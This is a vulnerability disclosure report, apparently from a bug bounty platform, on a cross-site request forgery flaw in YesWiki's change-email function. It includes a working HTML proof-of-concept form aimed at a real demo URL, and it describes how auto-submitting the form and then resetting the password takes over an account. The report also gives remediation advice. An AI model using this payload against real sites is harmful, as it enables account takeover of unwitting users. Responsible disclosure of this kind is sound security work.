Cross-Site Request Forgery (CSRF) in yeswiki/yeswiki
Reported on
Dec 6th 2021
Description
Hey all,
so i found that YesWiki doesn't implement any sort of anti-csrf mechanism, i found that the change email function is vulnerable to CSRF attacks which leads to Account Takeover.
Proof of Concept
<html>
<body>
<form method="POST" action="https://yeswiki.net/cercopitheque/demo/?ParametresUtilisateur">
<input type="hidden" name="usersettings_action" value="update"/>
<input type="hidden" name="email" value="testerhacker@gmail.com"/>
<input type="hidden" name="revisioncount" value="20"/>
<input type="submit" value="Submit">
</form>
</body>
<html>
Exploitation Scenario:
An attacker sends the above PoC to the victim.
rather than submit, the autosubmit attribute could be implemented, so the victim's email will be changed and he will be redirected to a third site.
an attacker now will reset his password via the changed email and he will be able to takeover the account.
NOTE: the attack could be applied to the admin account user which could be harmful to other users leading to compromise their confidentiality, integrity and availability.
Remediation Actions:
Implementing a anti-csrf AND/OR anti-csrf header with server-side checks should be sufficient to resolve the root cause of the issue.
Impact
Taking over user accounts.
Best Regards,
Moad
Occurrences
hey @maintainer, we can work on a fix if you want, please ping me using @researcher.
Thanks,
Moad
Hey @admin, i think that a CSRF that leads to Account Takeover deserves more than $5 ??
Hello @mdakh404, I would recommend creating an issue on our public roadmap where you can share your thoughts!
Hello @j9rem, can you please deploy a fix for this one ?